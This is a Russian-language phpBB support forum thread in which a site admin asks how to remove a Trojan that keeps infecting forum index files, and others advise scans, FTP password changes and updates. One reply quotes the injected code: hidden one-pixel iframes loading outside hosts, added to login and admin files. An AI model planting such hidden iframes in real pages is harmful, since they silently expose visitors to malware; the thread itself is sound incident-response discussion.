Уважаемые пользователи!
В версии phpBB 3.3.13 обнаружены ошибки при использовании функции поиска по конференции.
Обсуждение проблемы и ее решения здесь Re: Вышел phpBB 3.3.13 [обсуждаем].
В связи с этим, не рекомендуется установка и обновление до phpBB 3.3.13.
Ошибка будет устранена разработчиками в версии phpBB 3.3.14.
Скачать предыдущую версию - phpBB 3.3.12 - можно здесь.
В версии phpBB 3.3.13 обнаружены ошибки при использовании функции поиска по конференции.
Обсуждение проблемы и ее решения здесь Re: Вышел phpBB 3.3.13 [обсуждаем].
В связи с этим, не рекомендуется установка и обновление до phpBB 3.3.13.
Ошибка будет устранена разработчиками в версии phpBB 3.3.14.
Скачать предыдущую версию - phpBB 3.3.12 - можно здесь.
Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ).
-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 2 месяца
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 3 месяца
- Откуда: Бердск
антивирус.AdmninsCluba писал(а):Что надо сделать чтобы найти и убить скрипт?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 2 месяца
- Благодарил (а): 1 раз
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 3 месяца
- Откуда: Бердск
AdmninsCluba
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 2 месяца
- Благодарил (а): 1 раз
Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.А если не секрет, какая версия phpBB установлена?
Но версия не поменялась в админ панели. Может надо обновить форум?
Локалхоста нет. Резервную копию откатываю папками.ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Касперский найдет проблему в папках на компьютере или нет? Обязательно нужен Денвер?
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 3 месяца
- Откуда: Бердск
уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.AdmninsCluba писал(а):Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.
на вашем компьютере он найдет все что угодно.AdmninsCluba писал(а):Касперский найдет проблему в папках на компьютере или нет?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 2 месяца
- Благодарил (а): 1 раз
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 3 месяца
- Откуда: Бердск
AdmninsCluba писал(а):Почему я с трояном не смогу обновить версию форума?
можете, но так с ним и останетесьAdmninsCluba писал(а):Почистил файл - index.php. Не помогло
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- phpBB 2.0.13
- Сообщения: 917
- Стаж: 19 лет 3 месяца
- Откуда: с Луны свалил...
Сейчас эпидемия. Троян приобретается от зараженных сайтов через браузер IE, ворует пароли FTP (и не только) и заражает новые сайты.
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть
-
- phpBB 2.0.1
- Сообщения: 261
- Стаж: 18 лет 7 месяцев
-
- phpBB 2.0.13
- Сообщения: 917
- Стаж: 19 лет 3 месяца
- Откуда: с Луны свалил...
А как же при переустановке винды его не поставить? Или у вас другая ос.go писал(а):зачем ставить
Я в общем нашел, что троян убивает только файл iexplore.exe. Выявляется это и лечится утилитой HaxFix 4.41
У меня ссылка есть, но я ее не дам, так как это haxfix.exe. Подумаете еще плохое что-нибудь... Но найти не сложно.
После запуска надо выбрать 2. Run auto fix
Ну и потом, естественно все пароли сменить - фтп, аськи и т.д.
-
- phpBB Guru
- Сообщения: 5484
- Стаж: 20 лет 7 месяцев
- Поблагодарили: 2 раза
Некоторые технические подробности, поскольку недавно один клиент подцепил подобного трояна...
Внедряется в
admin/index.php
login.php
index.php
includes/auth.php
Добавляет такой код:
Или такой
Или оба вместе
Еще его вставляют в файлы index.html в папках.
После того как был сменен пароль на FTP, проблемы исчезли.
Внедряется в
admin/index.php
login.php
index.php
includes/auth.php
Добавляет такой код:
Код: Выделить всё
<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
Код: Выделить всё
<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Еще его вставляют в файлы index.html в папках.
После того как был сменен пароль на FTP, проблемы исчезли.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
-
- phpBB 1.2.1
- Сообщения: 20
- Стаж: 18 лет 1 месяц
- Откуда: Санкт-Петербург
У меня такое было - подробности кидал тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0
обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.
обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.